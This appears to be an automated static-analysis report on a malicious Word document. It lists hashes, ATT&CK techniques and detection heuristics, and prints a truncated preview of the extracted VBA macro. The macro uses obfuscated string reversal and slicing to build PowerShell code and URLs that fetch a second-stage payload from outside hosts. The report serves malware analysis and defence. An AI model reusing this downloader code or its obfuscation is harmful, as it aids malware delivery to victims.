Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 67c3c3a72115570e…

MALICIOUS

Office (OLE)

167.0 KB Created: 2017-11-29 08:04:00 Authoring application: Microsoft Office Word First seen: 2017-12-08
MD5: 2420fa5969f842b077f04f2f22e4669d SHA-1: ed992fa39c602d8aef064b3bd25c8d46f1fb95d0 SHA-256: 67c3c3a72115570e6f6a609dbf6f115aa2031fa1ef540742e3ece81776cbe72a
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains critical heuristics indicating the presence of VBA macros with auto-execution and Shell() calls, strongly suggesting malicious intent. The VBA script attempts to download and execute a second-stage payload from the reconstructed URL 'http://s40J+4oINRqanRoRwzj6lJWrJ7l40J+40JKht40J+40Jt40J+40'+'Jp://40J+40Jta40J+40Jswines.9S1+9KdIzutuOYmWcj4XD239k8FR'. This indicates a downloader or droppper functionality, commonly associated with malware delivery.

Heuristics 7

  • ClamAV: Doc.Macro.Obfuscation-6387400-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://s40J+4oINRqanRoRwzj6� In document text (OLE body)
    • http://www40J+40J.avc40JIn document text (OLE body)
    • http://r40J+40Ja40J+VQXXrUmpzMKK�In document text (OLE body)
    • http://w�ww$0.avc�In document text (OLE body)
    • http://s40J+4oINRqanRoRwzj6In document text (OLE body)
    • http://r40J+40Ja40J+VQXXrUmpzMKKIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 84550 bytes
SHA-256: fc8c97827c2fa9c30651b2653c83b3ab7a7fcb5401ce3c2a78ae9f823c946b6b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "EbMUjGwtI"
Function hPHzlQDnH()
MmSGYE = Array(StrReverse("iHFCqMtQKj"), StrReverse("hmsZZtJuzs"), StrReverse("tMqBOMcUBI"), StrReverse("sUtjjiRnAo"), StrReverse("mJzwFTMVuz"), StrReverse("BSFTXRQEoi"), StrReverse("jZOCqNsIpr"), StrReverse("bWtLFjPsvu"))
ZZaXduZiVm = Mid("lJWrJ 7l40J+40JKht40J+40Jt40J+40'+'Jp://40J+40Jta40J+40Jswines.9S1+9'+KdIzutuOYmWcj4XD239k8FR", 5, 66)
vwXTutw = Array(StrReverse("CdrmNVQMzk"), StrReverse("PjnVtwwikH"), StrReverse("KzEllzftXI"), StrReverse("jiJinGstnP"), StrReverse("QzlzZUVYnU"), StrReverse("RXosTEZFBO"), StrReverse("pWprAjaIhm"), StrReverse("GFuUrLMELR"))
zzzDA = Array(StrReverse("zHZDGaOaMS"), StrReverse("RNwVENvvHr"), StrReverse("bEfDWfYuNn"), StrReverse("CYItibzLwQ"), StrReverse("wRwWZNXXGs"), StrReverse("oTkESvbWha"), StrReverse("BUNYQtFFqd"), StrReverse("NjzrsKIJdI"))
AtDLmO = Array(StrReverse("zqPwCCPvYc"), StrReverse("hUDfUKJLJw"), StrReverse("BAaPQvnfXt"), StrReverse("CuLvuXfvQv"), StrReverse("RojajdIRDQ"), StrReverse("zbPDtwQzjH"), StrReverse("OjYfZnJHlz"), StrReverse("iNvOfNUzjn"))
zcVwkikof = Mid("E4mOXjYualN1CjI4ADaL5Rj9Sw]39) | . ( $VERBosEPrEfEReNCe.TOsTRiNG()[1,3]+'X'-jOiN'')j1k", 27, 57)
kRkpt = Array(StrReverse("IAoUwioDaj"), StrReverse("zcdVOiDXFf"), StrReverse("ISjdfEUsLI"), StrReverse("mStYSBjsZi"), StrReverse("FBiHdkFddO"), StrReverse("GkDzzqTLpt"), StrReverse("OvsSzjjEDN"), StrReverse("wLzXaGnZzu"))
aAwOmuONBR = Array(StrReverse("mVcGvaiIBw"), StrReverse("GfPJjhPABt"), StrReverse("UAjFlkjAXj"), StrReverse("dQQtUtHRkz"), StrReverse("IAGoqwzmiw"), StrReverse("zUwqSmoWVL"), StrReverse("udkVTqPWom"), StrReverse("awPBkTusPm"))
MvwzH = Array(StrReverse("wOABwiZriO"), StrReverse("DoJCHBVVRY"), StrReverse("MoqqkzMMnI"), StrReverse("fGHTnpVSdH"), StrReverse("jmjlBfvvDa"), StrReverse("YKYqWHXJQw"), StrReverse("WNDWjzhqOR"), StrReverse("jDrKpZFFoF"))
omUAG = Mid("G7OtdKEI0c7V6n40JDrHFDJIqn6nVDlCAc", 15, 3)
CljCPzpjidj = Array(StrReverse("mtSZiISZah"), StrReverse("FkwZFfQkVA"), StrReverse("jbzwYwEwGz"), StrReverse("swGiZALLmK"), StrReverse("XpvHhpCqwE"), StrReverse("CJWPDKwWBk"), StrReverse("DVTapIdNAF"), StrReverse("UFzKcufqOi"))
nsfWQ = Array(StrReverse("BRIMkUhRwf"), StrReverse("SLBflViMCE"), StrReverse("zFjluVSOAw"), StrReverse("CSULzFErmO"), StrReverse("PQtizUBMZT"), StrReverse("rsCkHwkWRO"), StrReverse("BTQAdzrqhj"), StrReverse("RraoohLzma"))
miTtKrWfCS = Array(StrReverse("iNmDsTuzvl"), StrReverse("SjEqaiRISd"), StrReverse("mjaKYQUGXZ"), StrReverse("kfPLWfOklw"), StrReverse("oAmrwmMHMh"), StrReverse("EQdDjwncfb"), StrReverse("wnaVBnRsTv"), StrReverse("ThWWplzjLm"))
zKwjEVijh = Mid("RMX2iT8NB5jJjjk1d5q9S1).r'+'EpLAcE(9S140J9S1,[sTRing][ChaR]39) )') -REPlaCE([chAr]100+[chAr]53+[chAr]113),[chAr]124 -CrePLACE([chAr]111+[chAr]82+[chAr]67),[chAr]36-CrePLACE'9S1',[chArfuj", 16, 168)
kvjVfEdXjw = Array(StrReverse("UGphFKPkEA"), StrReverse("UhZXMwAtFz"), StrReverse("dLisCAROvZ"), StrReverse("lmkruvdjvT"), StrReverse("jGmhLjRDbr"), StrReverse("hSsmwIcwiE"), StrReverse("sBoiPizhcR"), StrReverse("TQwmPWYwhS"))
JimcXUj = Array(StrReverse("EMupUTBLfX"), StrReverse("rlFJzAZQpL"), StrReverse("UTnRNXuHOu"), StrReverse("BDRsXmtkBi"), StrReverse("lFNwDibMZp"), StrReverse("MjtzRlYdcw"), StrReverse("ZuzkVnUNmK"), StrReverse("GpPHaPGrNf"))
LWUow = Array(StrReverse("qFnqvBQRfQ"), StrReverse("luiqwFKOtO"), StrReverse("oUHhEXCqLF"), StrReverse("HjzzUwkBcF"), StrReverse("QkjnfkBldh"), StrReverse("BNjFEVwFlY"), StrReverse("zaFaJEukVw"), StrReverse("UIlozEoTCU"))
jIoaP = Mid("X5tw0Jalon-gr40J+49S1+9S10Ja409S1+9S1J+40Jz'+'ia.40J+40J'+'ru/Hq40J+40Jrp40J+40J/740J+40Jl40J+40J9S1+9S1K.Split40J+49S1Mumbp6", 5, 115)
FFXUKR = Array(StrReverse("whhZiUKRam"), StrReverse("OQIEIqIcaP"), StrReverse("ONaPiXQmZC"), StrReverse("ijPwzsMYBA"), StrReverse("dCmAvpjLwj"), StrReverse("HdQwRiGSqL"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.